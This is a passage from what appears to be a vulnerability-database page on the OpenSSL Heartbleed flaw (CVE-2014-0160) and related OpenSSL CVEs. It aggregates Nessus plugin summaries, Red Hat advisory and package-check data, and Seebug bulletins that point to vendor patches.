crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors. (CVE-2010-0742) - RSA verification recovery in the EVP_PKEY_verify_recover function in OpenSSL 1.x before 1.0.0a, as used by pkeyutl and possibly other applications, returns uninitialized memory upon failure, which might allow context-dependent attackers to bypass intended key requirements or obtain sensitive information via unspecified vectors. NOTE: some of these details are obtained from third party information. (CVE-2010-1633) - Multiple race conditions in ssl/t1_lib.c in OpenSSL 0.9.8f through 0.9.8o, 1.0.0, and 1.0.0a, when multi- threading and internal caching are enabled on a TLS server, might allow remote attackers to execute arbitrary code via client data that triggers a heap- based buffer overflow, related to (1) the TLS server name extension and (2) elliptic curve cryptography. (CVE-2010-3864) - OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the downgrade to an unintended cipher via vectors involving sniffing network traffic to discover a session identifier. (CVE-2010-4180) - ssl/t1_lib.c in OpenSSL 0.9.8h through 0.9.8q and 1.0.0 through 1.0.0c allows remote attackers to cause a denial of service (crash), and possibly obtain sensitive information in applications that use OpenSSL, via a malformed ClientHello handshake message that triggers an out-of-bounds memory access, aka OCSP stapling vulnerability. (CVE-2011-0014) - crypto/x509/x509_vfy.c in OpenSSL 1.0.x before 1.0.0e does not initialize certain structure members, which makes it easier for remote attackers to bypass CRL validation by using a nextUpdate value corresponding to a time in the past. (CVE-2011-3207) - OpenSSL 0.9.8s and 1.0.0f does not properly support DTLS applications, which allows remote attackers to cause a denial of service (crash) via unspecified vectors related to an out-of-bounds read. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-4108. (CVE-2012-0050) - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. (CVE-2012-2110) - The ssl3_take_mac function in ssl/s3_both.c in OpenSSL 1.0.1 before 1.0.1f allows remote TLS servers to cause a denial of service (NULL pointer dereference and application crash) via a crafted Next Protocol Negotiation record in a TLS handshake. (CVE-2013-4353) - The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client. (CVE-2013-6449) - The DTLS retransmission implementation in OpenSSL 1.0.0 before 1.0.0l and 1.0.1 before 1.0.1f does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context and cause a denial of service (application crash) by interfering with packet delivery, related to ssl/d1_both.c and ssl/t1_enc.c. (CVE-2013-6450) - An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) - A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. (CVE-2014-3566) - A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183) Note that Nessus has not tested for this issue but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id127201
    published2019-08-12
    reporterThis script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/127201
    titleNewStart CGSL CORE 5.04 / MAIN 5.04 : openssl Multiple Vulnerabilities (NS-SA-2019-0033)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2014-0396.NASL
    descriptionAn updated rhev-hypervisor6 package that fixes one security issue is now available for Red Hat Enterprise Virtualization Hypervisor 3.2. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent. Important: This update is an emergency security fix being provided outside the scope of the published support policy for Red Hat Enterprise Virtualization listed in the References section. In accordance with the support policy for Red Hat Enterprise Virtualization, Red Hat Enterprise Virtualization Hypervisor 3.2 will not receive future security updates. Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. Users of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package, which corrects this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id79008
    published2014-11-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79008
    titleRHEL 6 : rhev-hypervisor6 (RHSA-2014:0396) (Heartbleed)
  • NASL familyWindows
    NASL idOPENVPN_2_3_3_0.NASL
    descriptionAccording to its self-reported version number, the version of OpenVPN installed on the remote host is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73668
    published2014-04-22
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73668
    titleOpenVPN 2.3.x Heartbeat Information Disclosure (Heartbleed)
  • NASL familyRed Hat Local Security Checks
    NASL idHP_VCA_SSRT101531-RHEL.NASL
    descriptionThe RPM installation of HP Version Control Agent (VCA) on the remote Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77022
    published2014-08-06
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/77022
    titleHP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)
  • NASL familySolaris Local Security Checks
    NASL idSOLARIS11_OPENSSL_20140731.NASL
    descriptionThe remote Solaris system is missing necessary patches to address security updates : - The ssl3_take_mac function in ssl/s3_both.c in OpenSSL 1.0.1 before 1.0.1f allows remote TLS servers to cause a denial of service (NULL pointer dereference and application crash) via a crafted Next Protocol Negotiation record in a TLS handshake. (CVE-2013-4353) - The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client. (CVE-2013-6449) - The DTLS retransmission implementation in OpenSSL 1.0.0 before 1.0.0l and 1.0.1 before 1.0.1f does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context and cause a denial of service (application crash) by interfering with packet delivery, related to ssl/d1_both.c and ssl/ t1_enc.c. (CVE-2013-6450) - The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack. (CVE-2014-0076) - The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. (CVE-2014-0160)
    last seen2020-06-01
    modified2020-06-02
    plugin id80721
    published2015-01-19
    reporterThis script is Copyright (C) 2015-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/80721
    titleOracle Solaris Third-Party Patch Update : openssl (multiple_vulnerabilities_in_openssl4) (Heartbleed)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201412-11.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201412-11 (AMD64 x86 emulation base libraries: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in AMD64 x86 emulation base libraries. Please review the CVE identifiers referenced below for details. Impact : A context-dependent attacker may be able to execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id79964
    published2014-12-15
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79964
    titleGLSA-201412-11 : AMD64 x86 emulation base libraries: Multiple vulnerabilities (Heartbleed)
  • NASL familyMisc.
    NASL idIPSWITCH_IMAIL_12_4_1_15.NASL
    descriptionThe remote host appears to be running Ipswitch IMail Server 11.x or 12.x older than version 12.4.1.15 and is, therefore, potentially affected by the following vulnerabilities : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id76490
    published2014-07-14
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76490
    titleIpswitch IMail Server 11.x / 12.x < 12.4.1.15 Multiple Vulnerabilities (Heartbleed)
  • NASL familyWindows
    NASL idIBM_GPFS_ISG3T1020683.NASL
    descriptionA version of IBM General Parallel File System (GPFS) prior to 3.5.0.17 is installed on the remote host. It is, therefore, affected by multiple vulnerabilities related to OpenSSL: - An information disclosure vulnerability exists due to a flaw in the OpenSSL library, due to an implementation error in ECDSA (Elliptic Curve Digital Signature Algorithm). An attacker could potentially exploit this vulnerability to recover ECDSA nonces. (CVE-2014-0076) - An information disclosure vulnerability exists due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device. (CVE-2014-0160)
    last seen2020-06-01
    modified2020-06-02
    plugin id74104
    published2014-05-20
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74104
    titleIBM General Parallel File System 3.5 < 3.5.0.17 Multiple OpenSSL Vulnerabilities (Heartbleed)
  • NASL familyMisc.
    NASL idVMWARE_HORIZON_WORKSPACE_VMSA2014-0004.NASL
    descriptionThe version of VMware Horizon Workspace installed on the remote host is version 1.8.x prior to 1.8.1. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73896
    published2014-05-06
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73896
    titleVMware Horizon Workspace 1.8 < 1.8.1 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL familyMisc.
    NASL idOPENSSL_HEARTBLEED.NASL
    descriptionBased on its response to a TLS request with a specially crafted heartbeat message (RFC 6520), the remote service appears to be affected by an out-of-bounds read flaw. This flaw could allow a remote attacker to read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data.
    last seen2019-10-28
    modified2014-04-08
    plugin id73412
    published2014-04-08
    reporterThis script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73412
    titleOpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL familyWindows
    NASL idATTACHMATE_REFLECTION_SECURE_IT_FOR_WIN_CLIENT_HEARTBLEED.NASL
    descriptionThe Attachmate Reflection Secure IT Windows Client install on the remote host contains a component, Reflection FTP Client, which is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73965
    published2014-05-12
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73965
    titleAttachmate Reflection Secure IT Windows Client Information Disclosure (Heartbleed)
  • NASL familyMisc.
    NASL idMCAFEE_EPO_SB10071.NASL
    descriptionThe remote host is running a version of McAfee ePolicy Orchestrator that is affected by an information disclosure due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73833
    published2014-05-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73833
    titleMcAfee ePolicy Orchestrator OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyAmazon Linux Local Security Checks
    NASL idALA_ALAS-2014-320.NASL
    descriptionA missing bounds check was found in the way OpenSSL handled TLS heartbeat extension packets. This flaw could be used to reveal up to 64k of memory from a connected client or server.
    last seen2020-06-01
    modified2020-06-02
    plugin id73438
    published2014-04-09
    reporterThis script is Copyright (C) 2014-2015 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73438
    titleAmazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2014-318.NASL
    descriptionThis is an openssl version update to 1.0.1g. - The main reason for this upgrade was to be clear about the TLS heartbeat problem know as
    last seen2020-06-05
    modified2014-06-13
    plugin id75331
    published2014-06-13
    reporterThis script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/75331
    titleopenSUSE Security Update : openssl (openSUSE-SU-2014:0560-1) (Heartbleed)
  • NASL familyWindows
    NASL idLIBREOFFICE_423.NASL
    descriptionA version of LibreOffice 4.2.x prior to 4.2.3 is installed on the remote Windows host. This version of LibreOffice is bundled with a version of OpenSSL affected by multiple vulnerabilities : - An error exists in the function
    last seen2020-06-01
    modified2020-06-02
    plugin id76510
    published2014-07-15
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76510
    titleLibreOffice 4.2.x < 4.2.3 OpenSSL Multiple Vulnerabilities (Heartbleed)
  • NASL familyMisc.
    NASL idMCAFEE_VSEL_SB10071.NASL
    descriptionThe remote host has a version of McAfee VirusScan Enterprise for Linux (VSEL) that is affected by an information disclosure due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73854
    published2014-05-03
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73854
    titleMcAfee VirusScan Enterprise for Linux OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyMandriva Local Security Checks
    NASL idMANDRIVA_MDVSA-2015-062.NASL
    descriptionMultiple vulnerabilities has been discovered and corrected in openssl : Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment (CVE-2010-5298). The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack (CVE-2014-0076). The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160). The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment (CVE-2014-0195). The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition (CVE-2014-0198). The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake (CVE-2014-0221). OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224). The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value (CVE-2014-3470). Memory leak in d1_srtp.c in the DTLS SRTP extension in OpenSSL 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted handshake message (CVE-2014-3513). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566). Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure (CVE-2014-3567). The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported protocols, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an unexpected handshake, as demonstrated by an SSLv3 handshake to a no-ssl3 application with certain error handling. NOTE: this issue became relevant after the CVE-2014-3568 fix (CVE-2014-3569). The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570). OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c (CVE-2014-3571). The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message (CVE-2014-3572). OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate
    last seen2020-06-01
    modified2020-06-02
    plugin id82315
    published2015-03-30
    reporterThis script is Copyright (C) 2015-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/82315
    titleMandriva Linux Security Advisory : openssl (MDVSA-2015:062)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2014-0377.NASL
    descriptionUpdated openssl packages that fix one security issue are now available for Red Hat Storage 2.1. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All users of Red Hat Storage are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen2020-06-01
    modified2020-06-02
    plugin id79005
    published2014-11-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79005
    titleRHEL 6 : Storage Server (RHSA-2014:0377) (Heartbleed)
  • NASL familyWindows
    NASL idKASPERSKY_INTERNET_SECURITY_HEARTBLEED.NASL
    descriptionThe remote host has a version of Kaspersky Internet Security (KIS) installed that is missing a vendor patch. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77437
    published2014-08-29
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/77437
    titleKaspersky Internet Security Heartbeat Information Disclosure (Heartbleed)
  • NASL familyMisc.
    NASL idOPENVPN_HEARTBLEED.NASL
    descriptionBased on its response to a TLS request with a specially crafted heartbeat message (RFC 6520), the remote OpenVPN service appears to be affected by an out-of-bounds read flaw. Because the remote OpenVPN service does not employ the
    last seen2020-06-01
    modified2020-06-02
    plugin id73491
    published2014-04-14
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73491
    titleOpenVPN Heartbeat Information Disclosure (Heartbleed)
  • NASL familyGeneral
    NASL idVMWARE_PLAYER_LINUX_6_0_2.NASL
    descriptionThe installed version of VMware Player 6.x running on Linux is prior to 6.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73671
    published2014-04-21
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73671
    titleVMware Player 6.x < 6.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Linux) (Heartbleed)

Packetstorm

Redhat

advisories
  • bugzilla
    id1084875
    titleCVE-2014-0160 openssl: information disclosure in handling of TLS heartbeat extension packets
    oval
    OR
    • commentRed Hat Enterprise Linux must be installed
      ovaloval:com.redhat.rhba:tst:20070304026
    • AND
      • commentRed Hat Enterprise Linux 6 is installed
        ovaloval:com.redhat.rhba:tst:20111656003
      • OR
        • AND
          • commentopenssl-devel is earlier than 0:1.0.1e-16.el6_5.7
            ovaloval:com.redhat.rhsa:tst:20140376001
          • commentopenssl-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhba:tst:20171929002
        • AND
          • commentopenssl is earlier than 0:1.0.1e-16.el6_5.7
            ovaloval:com.redhat.rhsa:tst:20140376003
          • commentopenssl is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhba:tst:20171929008
        • AND
          • commentopenssl-static is earlier than 0:1.0.1e-16.el6_5.7
            ovaloval:com.redhat.rhsa:tst:20140376005
          • commentopenssl-static is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhba:tst:20171929006
        • AND
          • commentopenssl-perl is earlier than 0:1.0.1e-16.el6_5.7
            ovaloval:com.redhat.rhsa:tst:20140376007
          • commentopenssl-perl is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhba:tst:20171929004
    rhsa
    idRHSA-2014:0376
    released2014-04-08
    severityImportant
    titleRHSA-2014:0376: openssl security update (Important)
  • rhsa
    idRHSA-2014:0377
  • rhsa
    idRHSA-2014:0378
  • rhsa
    idRHSA-2014:0396
rpms
  • openssl-0:1.0.1e-16.el6_5.7
  • openssl-debuginfo-0:1.0.1e-16.el6_5.7
  • openssl-devel-0:1.0.1e-16.el6_5.7
  • openssl-perl-0:1.0.1e-16.el6_5.7
  • openssl-static-0:1.0.1e-16.el6_5.7
  • openssl-0:1.0.1e-16.el6_5.7
  • openssl-debuginfo-0:1.0.1e-16.el6_5.7
  • openssl-devel-0:1.0.1e-16.el6_5.7
  • openssl-perl-0:1.0.1e-16.el6_5.7
  • openssl-static-0:1.0.1e-16.el6_5.7
  • rhev-hypervisor6-0:6.5-20140407.0.el6ev
  • rhev-hypervisor6-0:6.5-20140118.1.3.2.el6_5
  • rhevm-spice-client-x64-cab-0:3.3-12.el6_5
  • rhevm-spice-client-x64-msi-0:3.3-12.el6_5
  • rhevm-spice-client-x86-cab-0:3.3-12.el6_5
  • rhevm-spice-client-x86-msi-0:3.3-12.el6_5

Seebug

  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 McAfee Email Gateway是一款全面的电子邮件安全解决方案。 McAfee Email Gateway所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 McAfee Email Gateway 7.x 目前厂商已经发布了升级补丁以修复漏洞,请下载使用: https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10071
    idSSV:62192
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleMcAfee Email Gateway OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 McAfee Endpoint Intelligence Agent是一款McAfee产品中所使用的一个网络服务。 McAfee Endpoint Intelligence Agent所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 McAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent) McAfee Endpoint Intelligence Agent 2.2.1版本已修复该漏洞,建议用户下载使用: http://www.mcafee.com
    idSSV:62238
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titleMcAfee Endpoint Intelligence Agent OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 IBM AIX是一款商业性质的操作系统。 IBM AIX所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 IBM AIX 6.x IBM AIX 7.x 用户可参考如下厂商提供的安全补丁以修复该漏洞: http://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&amp;ID=3489
    idSSV:62187
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleIBM AIX OpenSSL TLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionCVE ID:CVE-2014-0160 IBM XIV Storage System是一款网格存储解决方案。 IBM XIV Storage System所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 IBM XIV Storage System 11.3.0 IBM XIV Storage System 11.3.0.a IBM XIV Storage System 11.3.1 IBM XIV Storage System 11.4.1 IBM XIV Storage System 11.4.1.a 用户可参考如下厂商提供的安全公告获取补丁以修复该漏洞: http://www.ibm.com/support/docview.wss?uid=ssg1S1004577
    idSSV:62188
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleIBM XIV Storage System OpenSSL TLS/DTLS心跳信息泄漏漏洞
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:86061
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-86061
    titleHeartbleed OpenSSL - Information Leak Exploit (1)
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:86255
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-86255
    titleHeartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support
  • bulletinFamilyexploit
